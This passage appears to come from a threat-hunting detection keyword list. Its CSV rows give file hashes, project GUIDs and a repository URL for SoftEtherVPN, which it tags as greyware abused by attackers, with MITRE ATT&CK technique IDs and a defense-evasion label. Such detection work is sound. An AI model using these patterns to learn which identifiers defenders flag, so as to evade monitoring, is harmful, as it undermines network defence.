T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*7459f321ec957d160f95ccf5fccc46be6f2c26bd78f0bcdf03d53ae131d051f5*",".{0,1000}7459f321ec957d160f95ccf5fccc46be6f2c26bd78f0bcdf03d53ae131d051f5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*78a34aed87a873fb155ca34ec30ec520bf64f34fbe4452be2ba3a8a928a28e30*",".{0,1000}78a34aed87a873fb155ca34ec30ec520bf64f34fbe4452be2ba3a8a928a28e30.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*7b3ed9e4b5430bbfbb619e7367e05319fc41102dba1dd2103a25f37d66dcd1b0*",".{0,1000}7b3ed9e4b5430bbfbb619e7367e05319fc41102dba1dd2103a25f37d66dcd1b0.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*7be4b33d5f554546778d2f4b35cab35ea4157cad14b68cbc730bf4279fe3d3fb*",".{0,1000}7be4b33d5f554546778d2f4b35cab35ea4157cad14b68cbc730bf4279fe3d3fb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol 
VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*7c437d4d02d7e2a936b4c1ff7bc8f5abbf16786746deffa92d5f5f2fd7ba04fb*",".{0,1000}7c437d4d02d7e2a936b4c1ff7bc8f5abbf16786746deffa92d5f5f2fd7ba04fb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*7e2641906f4beeaf11dff6c4aefc9be37bae9a314ce2357dd88b804387ecd096*",".{0,1000}7e2641906f4beeaf11dff6c4aefc9be37bae9a314ce2357dd88b804387ecd096.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*81CA3EC4-026E-4D37-9889-828186BBB8C0*",".{0,1000}81CA3EC4\-026E\-4D37\-9889\-828186BBB8C0.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#GUIDproject","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*820d4bccb36fefaa8b77fed456872ddd63a433fa5ce3dd024ccf3f9c93710c30*",".{0,1000}820d4bccb36fefaa8b77fed456872ddd63a433fa5ce3dd024ccf3f9c93710c30.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform 
multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*87d7db96fb7c8fd8668f69717d84c9cc36f3c2ae96a8ef2187fb4b3544fabf5d*",".{0,1000}87d7db96fb7c8fd8668f69717d84c9cc36f3c2ae96a8ef2187fb4b3544fabf5d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*9135fc8890e155d1a3dac0907b5081e171cbbfddb6e19e238741d719c951d2ef*",".{0,1000}9135fc8890e155d1a3dac0907b5081e171cbbfddb6e19e238741d719c951d2ef.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*93050aec30d7f0268e4fa3ac695a1131f838fe19a625bf574c322c1914b76c93*",".{0,1000}93050aec30d7f0268e4fa3ac695a1131f838fe19a625bf574c322c1914b76c93.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*9aa8a85153861516996a7c38d282bce08be9fb8d1d5ea707173fc6d43c5c8e8a*",".{0,1000}9aa8a85153861516996a7c38d282bce08be9fb8d1d5ea707173fc6d43c5c8e8a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*9b8973d38cfee2c1e90385a1d25741dd4d9a72f426252719ac46bc8b89975618*",".{0,1000}9b8973d38cfee2c1e90385a1d25741dd4d9a72f426252719ac46bc8b89975618.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*a54e83a923cedcae9c948e438cc3213c49e2c207f3914fdb5254d213d62604eb*",".{0,1000}a54e83a923cedcae9c948e438cc3213c49e2c207f3914fdb5254d213d62604eb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*a58286cef52371c6103a194d90224cd693e69b544e06fa40784de35af6277512*",".{0,1000}a58286cef52371c6103a194d90224cd693e69b544e06fa40784de35af6277512.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*ab5ec32d639fa8346bf81b3c610f87a14977c7f7151b869214f43904d96915ca*",".{0,1000}ab5ec32d639fa8346bf81b3c610f87a14977c7f7151b869214f43904d96915ca.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*af75ab9765d7f9003aeffef2587615a1f57ed9b6f1bbe44830592b444da8f295*",".{0,1000}af75ab9765d7f9003aeffef2587615a1f57ed9b6f1bbe44830592b444da8f295.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*b2fbf30e0db9dd21a011d733f210f9c7944f4cdf3903c352946c3f88e760746d*",".{0,1000}b2fbf30e0db9dd21a011d733f210f9c7944f4cdf3903c352946c3f88e760746d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*b4c16d2e012d0c946e0826ab7e34acc035eca9d1a94a5fd30f394124296c962b*",".{0,1000}b4c16d2e012d0c946e0826ab7e34acc035eca9d1a94a5fd30f394124296c962b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - 
T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*b5649a8ea3cc6477325e09e2248ef708d434ee3b2251eb8764bcfc15fb1de456*",".{0,1000}b5649a8ea3cc6477325e09e2248ef708d434ee3b2251eb8764bcfc15fb1de456.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*b884750041a05d7998e07110ba366d19af3c35157c95524b240707f81ce9572c*",".{0,1000}b884750041a05d7998e07110ba366d19af3c35157c95524b240707f81ce9572c.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*BA902FC8-E936-44AA-9C88-57D358BBB700*",".{0,1000}BA902FC8\-E936\-44AA\-9C88\-57D358BBB700.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#GUIDproject","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*bca2f7b65962dc1ef67996d9c853158b9beb3c73755fda6c217dd2883b9ab29d*",".{0,1000}bca2f7b65962dc1ef67996d9c853158b9beb3c73755fda6c217dd2883b9ab29d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - 
T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*c3b6f554126e1bc5dee6dff6d0b8dcd7241abbccff9898be3224ff90912c6c4c*",".{0,1000}c3b6f554126e1bc5dee6dff6d0b8dcd7241abbccff9898be3224ff90912c6c4c.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*c4dc53f4912605a25c18357b0a0bf6dc059286ca901cb981abdf1a22d1649ddc*",".{0,1000}c4dc53f4912605a25c18357b0a0bf6dc059286ca901cb981abdf1a22d1649ddc.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*c7647cb1c2631105bb032dad94057bfa62970d70dfa48f8be0c1a4160ff7c56d*",".{0,1000}c7647cb1c2631105bb032dad94057bfa62970d70dfa48f8be0c1a4160ff7c56d.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*c99142c5e55fae055955332964c56d29aba10bec9764ab961aebabf6c3ee1462*",".{0,1000}c99142c5e55fae055955332964c56d29aba10bec9764ab961aebabf6c3ee1462.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform 
multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*ca32067f8f93d2cc0aa1ead819aa8db3e6803c1e535e377598548f41c34ccac4*",".{0,1000}ca32067f8f93d2cc0aa1ead819aa8db3e6803c1e535e377598548f41c34ccac4.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*ca5ae82e1e5269bc00b2539f84d0c5d258601741c905b7fe02ff6bd6e06089c1*",".{0,1000}ca5ae82e1e5269bc00b2539f84d0c5d258601741c905b7fe02ff6bd6e06089c1.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*cb36d409779d4a7b0285552c3bc41efc576b4a22ca5fea6f4c288e1e96f7f4eb*",".{0,1000}cb36d409779d4a7b0285552c3bc41efc576b4a22ca5fea6f4c288e1e96f7f4eb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*cbf8cb94407c028df22b4b16607adf543aa3087f079c4d7906bbb1d9081b7179*",".{0,1000}cbf8cb94407c028df22b4b16607adf543aa3087f079c4d7906bbb1d9081b7179.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*ccef810ad3e3d55975e4acaf210e75ee63fa5de1069c8c4ab1579765d541170b*",".{0,1000}ccef810ad3e3d55975e4acaf210e75ee63fa5de1069c8c4ab1579765d541170b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*cf194caf93ce5a46768876b5fee0f644f6878e0a4dea0e391bf4ea1689731cb5*",".{0,1000}cf194caf93ce5a46768876b5fee0f644f6878e0a4dea0e391bf4ea1689731cb5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*code.onedev.io/SoftEther/VPN.git*",".{0,1000}code\.onedev\.io\/SoftEther\/VPN\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*d075c00b275c76255d94d50dcff34b3e8238783c137551d3eeee8351eaaf2361*",".{0,1000}d075c00b275c76255d94d50dcff34b3e8238783c137551d3eeee8351eaaf2361.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*d68eab271b4e5ec8de105d2bf87d9b3bf6b1f56634bc2259573ea371883d31f0*",".{0,1000}d68eab271b4e5ec8de105d2bf87d9b3bf6b1f56634bc2259573ea371883d31f0.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*d70cda7c8116dab7b29389db19375fcec3422cc05737f8f151803ad767eaac80*",".{0,1000}d70cda7c8116dab7b29389db19375fcec3422cc05737f8f151803ad767eaac80.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*d7b7a7f5495c5fa5ab70827e041e6f48b2e3a13d26c83706369f8b83080a2e8f*",".{0,1000}d7b7a7f5495c5fa5ab70827e041e6f48b2e3a13d26c83706369f8b83080a2e8f.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*dcd12874e909f6f973d17a9a9a4bb2bb5c0eb1dde3c840a01d9b8a2f89217e76*",".{0,1000}dcd12874e909f6f973d17a9a9a4bb2bb5c0eb1dde3c840a01d9b8a2f89217e76.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*df5b10dce307f6a8cbec606b0eaaf11dff457a5cc46c1b16f62cd29d39e610a1*",".{0,1000}df5b10dce307f6a8cbec606b0eaaf11dff457a5cc46c1b16f62cd29d39e610a1.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*dfb21c50807a7fe098be6e333af0807a1b22f67abf42e036d06f06d594a01fbc*",".{0,1000}dfb21c50807a7fe098be6e333af0807a1b22f67abf42e036d06f06d594a01fbc.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*e0f22e76771f73fd1b8b91f8ed3c6d2ecc3f5bf1b8b72e8a0208ddc43bc83191*",".{0,1000}e0f22e76771f73fd1b8b91f8ed3c6d2ecc3f5bf1b8b72e8a0208ddc43bc83191.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - 
T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*e16fca64d823fe922146ce8d9d908a4fff879dd5a89985f547661706579eb240*",".{0,1000}e16fca64d823fe922146ce8d9d908a4fff879dd5a89985f547661706579eb240.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*e1e0882b31d096b3d7c4dd7e433dec30e36d165610621f4e34a705b35fac5335*",".{0,1000}e1e0882b31d096b3d7c4dd7e433dec30e36d165610621f4e34a705b35fac5335.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*e4c962237d4b3e6e4af1be6082ef976c32b80d17b5c24079b9c59f0ba9775e7e*",".{0,1000}e4c962237d4b3e6e4af1be6082ef976c32b80d17b5c24079b9c59f0ba9775e7e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*e5469979ac08d21bad44cd7696187e80d4ef78b60f473a954936de4cbc3d0381*",".{0,1000}e5469979ac08d21bad44cd7696187e80d4ef78b60f473a954936de4cbc3d0381.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol 
VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*f0d3f6d841b1d8e4478f25771fa6f58717fed13de6c28dec36bf497c7b035853*",".{0,1000}f0d3f6d841b1d8e4478f25771fa6f58717fed13de6c28dec36bf497c7b035853.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*f139f24cb99599d9f666d925cf0371aff4eaf5fbf531634ee3a2740d5b646da3*",".{0,1000}f139f24cb99599d9f666d925cf0371aff4eaf5fbf531634ee3a2740d5b646da3.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*f1b1b2b181d6148660067534534e7c85f49241068fca8b3c1f6099216b67fb39*",".{0,1000}f1b1b2b181d6148660067534534e7c85f49241068fca8b3c1f6099216b67fb39.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
